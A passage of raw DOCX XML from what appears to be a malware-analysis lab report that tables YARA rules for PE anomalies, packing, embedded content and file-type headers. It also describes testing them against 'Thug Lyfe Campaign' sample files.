                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId29">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SuspiciousSectionCount.yar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Flags PE files with &lt;3 or &gt;10 sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b8y0r7a8m856" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Configurations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="95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6675"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2850"/>
            <w:gridCol w:w="6675"/>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Rule Name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Purpose</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId30">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">HighEntropy.yar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Flags sections with entropy &gt;7, excluding .rsrc and .reloc, as those naturally have higher entropy.</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4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId31">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">mismatched_pe_header.yar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Checks for valid PE headers at the correct offset that also have the incorrect magic number MZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="48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C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId32">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">upx_packed.yar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Identifies UPX-packed files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bmiiow2v4ax4" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Embedded Content</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>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560"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1905"/>
            <w:gridCol w:w="7560"/>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Rule Name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Purpose</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId33">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">DetectHTTP.yar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IPv4 addresses and HTTP/HTTPS descriptors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D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId34">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">EmbeddedPE.yar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Ensures "This program cannot be run in DOS mode" appears only once</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F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId35">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">pdf.yar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Validates PDF files using EOF markers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thug.yar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Searches for "Thug.Lyfe" strings in files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D3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId36">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">HighEntropyAny.yar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sections with high entropy that contain .rsrc and .reloc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xqpknlbrcket" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Type Checks </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>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6750"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2700"/>
            <w:gridCol w:w="6750"/>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Rule Name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Purpose</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId37">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">AAC_FileTypeCheck.yara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AAC file using file headers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A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId38">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">AIFF_FileTypeCheck.yara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an AIFF file using headers and other hex identifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId39">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ALAC_FileTypeCheck.yara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an ALAC file using the file header</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DE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId40">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">BMP_FileTypeCheck.yara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BMP file formats using headers and other hex identifiers [FIXED]</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0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId41">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">GIF_FileTypeCheck.yara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GIF file formats using the file header</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2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId42">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">HEIF__FileTypeCheck.yara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 HEIF image files based on headers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4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId43">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">JPEG_FileTypeCheck.yara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JPEG-formatted files using hex identifiers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6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId44">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">JPG_FileTypeCheck.yara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JPG file format using hex headers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8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">MP3_FileTypeCheck.yara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 MP3 audio files based on headers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A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId46">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PDF_FileTypeCheck.yara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PDF file format using headers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C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId47">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PNG_FileTypeCheck.yara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PNG using hex identifiers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E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId48">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">PSD_FileTypeCheck.yara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PSD file using file headers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F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId49">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SVG_FileTypeCheck.yara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SVG file format using file headers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F2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId50">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">TTA_FileTypeCheck.yara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.tta files using headers and other hex identifiers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F4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId51">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Vox_FileTypeCheck.yara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.vox files using file headers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F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId52">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">WAV_FileTypeCheck.yara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.wav files using headers and other hex identifiers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F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId53">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">WMA_FileTypeCheck.yara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.wma files using headers and other hex identifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="575.9252929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FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1155cc"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId54">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">WebP_FileTypeCheck.yara</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WebP file formats using hex identifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9vycro4i76ri" w:id="19"/>
      <w:bookmarkEnd w:id="1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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_857cwmwwrf2g" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing the File Type Checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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precursor to this assignment, the Yara </w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">File Type Check files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were created. All of these files have been tested, refined, and updated to run smoothly in a PowerShell scripting environment without any errors. The following screenshots show the File Type Check Yara rules that were triggered when run against the five Thug Lyfe Campaign files. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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 of JPEG Checker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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10138" cy="794750"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="8" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4910138" cy="7947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 of JPG Checker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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67288" cy="668673"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="1" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4967288" cy="66867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5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="930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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="930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rules that located artifacts, JPEG and JPG checkers respectively, each flagged two files: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">frontpage.jpg and volt.wav. </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
